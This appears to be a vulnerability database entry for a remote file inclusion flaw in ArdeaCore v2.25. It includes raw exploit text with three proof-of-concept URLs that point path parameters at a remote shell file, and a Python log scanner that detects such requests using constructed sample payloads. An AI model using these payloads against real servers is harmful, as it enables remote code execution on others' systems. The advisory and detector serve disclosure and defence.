Vendor: ArdeaCore
Discovered by: n0n0x
CVSS: 9.8 (HIGH)
Type: Remote Code Execution
CWE: 94
Product Name: ArdeaCore
Affected Version From: 2.25
Affected Version To: 2.25
Patch Exists: YES
Related CWE: N/A
CPE: a:priasantai:ardea_core:2.25
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2020


A remote code execution vulnerability exists in ArdeaCore v2.25 because the path parameters pathForArdeaCore (ardeaInit.php), CURRENT_BLOG_PATH (ardeaBlog.php) and appMVCPath (ardeaMVC.php) are used without validation of the user-supplied value. An attacker can exploit this by sending an HTTP request that sets one of these parameters to the URL of a remote file under their control. Successful exploitation could allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of ArdeaCore (later than v2.25).

Exploit-DB raw data:

******************************************************
[!] Discovered: n0n0x
[!] Homepage: http://priasantai.uni.cc/
[!] Remote: yes
******************************************************
  
*****************************************[ Hello gay ]***********************************************
****************************************************************************************************************
[x] PoC:

http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaBlog.php?CURRENT_BLOG_PATH=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/mvc/ardeaMVC.php?appMVCPath=[http://server/shell.tmp???]
****************************************************************************************************************

*****************************************[ Hello gay ]***********************************************
 
****************************************************************************************************************
[!] Thanks:
 
    manadocoding.net, sekuritionline.net
****************************************************************************************************************
[!] Greetz:
 
    str0ke, angky.tatoki,EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin,team_elite
    devilbat.

[!] special thanks : cr4wl3r - cyberl0g
****************************************************************************************************************
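Added example (not part of the advisory above or of ArdeaCore itself): a small Python scanner that flags access-log requests to the three scripts named in the PoC whose path parameter carries a remote URL instead of a local path. The log lines, IP addresses and file names are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# ArdeaCore v2.25 scripts and the path parameter each one reads, taken from
# the PoC URLs in the advisory above. Script names are matched lowercased.
ARDEA_PATH_PARAMS = {
    "ardeainit.php": "pathForArdeaCore",
    "ardeablog.php": "CURRENT_BLOG_PATH",
    "ardeamvc.php": "appMVCPath",
}

# Request line inside a Common Log Format entry: "METHOD /path?query HTTP/1.x"
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# A value that starts with a URL scheme (http://, https://, ftp://, ...) is
# not a local path: it points the include at a remote host, as the PoC does.
_REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def check_request_target(target):
    """Return (script, param, value) when the request targets one of the
    ArdeaCore scripts with its path parameter set to a remote URL, else None."""
    parsed = urlparse(target)
    script = parsed.path.rsplit("/", 1)[-1].lower()
    param = ARDEA_PATH_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes, so an encoded http%3A%2F%2F is caught as well.
    for value in parse_qs(parsed.query, keep_blank_values=True).get(param, []):
        if _REMOTE_RE.match(value.strip()):
            return script, param, value
    return None


def scan_log(lines):
    """Yield (line_no, script, param, value) for every suspicious log line."""
    for line_no, line in enumerate(lines, 1):
        m = _REQUEST_RE.search(line)
        hit = check_request_target(m.group(1)) if m else None
        if hit:
            yield (line_no,) + hit


# Constructed sample access-log lines (not captured from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2020:12:00:01 +0000] "GET /ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=lib/core/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2020:12:00:02 +0000] "GET /ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=http://198.51.100.7/inc.txt? HTTP/1.1" 200 80',
    '203.0.113.5 - - [10/Mar/2020:12:00:03 +0000] "GET /ardeaCore/lib/core/mvc/ardeaMVC.php?appMVCPath=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 80',
    '203.0.113.5 - - [10/Mar/2020:12:00:04 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 404 0',
]
```

Only lines 2 and 3 of the sample are reported: the first carries a local path and the last targets a script outside ArdeaCore.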